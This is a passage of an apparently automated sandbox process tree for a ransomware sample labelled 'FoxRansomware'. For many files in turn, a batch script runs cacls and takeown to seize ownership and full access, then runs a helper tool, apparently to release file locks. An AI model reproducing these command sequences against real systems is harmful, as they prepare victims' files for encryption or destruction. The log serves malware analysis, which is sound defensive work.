    PID:5204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"
    3⤵
    - Modifies file permissions
    PID:5584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000056.bin" -nobanner
    3⤵
    PID:6100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000056.bin" -nobanner
      4⤵
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C
    3⤵
    PID:6752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"
    3⤵
    PID:6604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000072.bin" -nobanner
    3⤵
    PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000072.bin" -nobanner
      4⤵
      PID:5680
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""
  2⤵
  PID:6952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"
    3⤵
    - Modifies file permissions
    PID:7044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007C.bin" -nobanner
    3⤵
    PID:5612
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007C.bin" -nobanner
      4⤵
      PID:5660
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""
  2⤵
  PID:5596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"
    3⤵
    - Modifies file permissions
    PID:5192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000007M.bin" -nobanner
    3⤵
    PID:4700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000007M.bin" -nobanner
      4⤵
      PID:5560
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:2288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "device.png" -nobanner
    3⤵
    PID:6992
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "device.png" -nobanner
      4⤵
      PID:4536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""
  2⤵
  PID:3688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000008L.bin" -nobanner
    3⤵
    PID:7100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000008L.bin" -nobanner
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6068
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6292
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""
  2⤵
  PID:6620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000091.bin" -nobanner
    3⤵
    PID:6560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000091.bin" -nobanner
      4⤵
      PID:6508
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:5248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6832
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6596
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""
  2⤵
  PID:3424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C
    3⤵
    PID:6356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"
    3⤵
    PID:5140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000009M.bin" -nobanner
    3⤵
    PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000009M.bin" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"
    3⤵
    PID:6392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000A7.bin" -nobanner
    3⤵
    PID:5488
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000A7.bin" -nobanner
      4⤵
      PID:2084
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:5212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:6208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Modifies file permissions
    PID:6764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:4696
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:5344
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:6112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      PID:1112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:6156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      PID:6852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl""
  2⤵
  PID:7164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" /E /G Admin:F /C
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl"
    3⤵
    PID:7140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" -nobanner
    3⤵
    PID:6792
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" -nobanner
      4⤵
      PID:6684
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""
  2⤵
  PID:820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C
    3⤵
    PID:7048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000D.bin" -nobanner
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000D.bin" -nobanner
      4⤵
      PID:5268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""
  2⤵
  PID:6760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C
    3⤵
    PID:6224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000P.bin" -nobanner
    3⤵
    PID:6808
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000P.bin" -nobanner
      4⤵
      PID:6052
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""
  2⤵
  PID:4772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000013.bin" -nobanner
    3⤵
    PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000013.bin" -nobanner
      4⤵
      PID:6432
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin" /E /G Admin:F /C
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin"
    3⤵
    PID:6944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006F.bin" -nobanner
    3⤵
    PID:5256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006F.bin" -nobanner
      4⤵
      PID:1780
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""
  2⤵
  PID:6272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"
    3⤵
    - Modifies file permissions
    PID:6092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006P.bin" -nobanner
    3⤵
    PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006P.bin" -nobanner
      4⤵
      PID:3376
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""
  2⤵
  PID:4536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"
    3⤵
    - Modifies file permissions
    PID:3728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000073.bin" -nobanner
    3⤵
    PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000073.bin" -nobanner
      4⤵
      PID:4456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""
  2⤵
  PID:5324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"
    3⤵
    - Modifies file permissions
    PID:2896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000081.bin" -nobanner
    3⤵
    PID:6544
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000081.bin" -nobanner
      4⤵
      PID:4692
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin""
  2⤵
  PID:6292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin" /E /G Admin:F /C
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin"
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000009D.bin" -nobanner
    3⤵
    PID:6304
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000009D.bin" -nobanner
      4⤵
      PID:5700
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin""
  2⤵
  PID:6560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin" /E /G Admin:F /C
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin"
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000AJ.bin" -nobanner
    3⤵
    PID:6768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000AJ.bin" -nobanner
      4⤵
      PID:6556
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin""
  2⤵
  PID:6564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin" /E /G Admin:F /C
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000AV.bin" -nobanner
    3⤵
    PID:3244
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000AV.bin" -nobanner
      4⤵
      PID:1428
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7112
- C:\Windows\SysWOW64\cmd.exe
